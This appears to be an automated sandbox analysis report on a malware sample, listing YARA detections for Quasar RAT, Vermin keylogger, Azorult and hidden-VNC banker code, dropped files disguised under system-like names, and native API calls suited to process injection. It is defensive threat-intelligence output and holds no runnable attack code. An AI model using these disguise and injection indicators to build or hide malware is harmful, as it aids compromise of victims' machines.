Source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: dropped/windef.exe, type: DROPPED	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: dropped/windef.exe, type: DROPPED	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: dropped/windef.exe, type: DROPPED	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: dropped/windef.exe, type: DROPPED	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: dropped/windef.exe, type: DROPPED	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: dropped/windef.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10

Contains functionality to shutdown / reboot the system

Source: C:\Windows\System32\svchost.exe

5_2_00C7B11C

Found potential string decryption / allocating functions

Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: String function: 00A68900 appears 32 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 00DD37CB appears 38 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 00DD8900 appears 49 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 00403BF4 appears 46 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 004062FC appears 42 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 00404E98 appears 86 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 0040300C appears 32 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 00404EC0 appears 33 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 00DE1940 appears 33 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 004034E4 appears 33 times

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB318A NtWow64QueryInformationProcess64,GetModuleHandleW,GetProcAddress,NtWow64QueryInformationProcess64,	4_2_00AB318A
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB2591 NtCreateSection,memset,RtlNtStatusToDosError,ZwClose,	4_2_00AB2591
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB27FB NtUnmapViewOfSection,RtlNtStatusToDosError,	4_2_00AB27FB
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB27C1 NtMapViewOfSection,RtlNtStatusToDosError,	4_2_00AB27C1
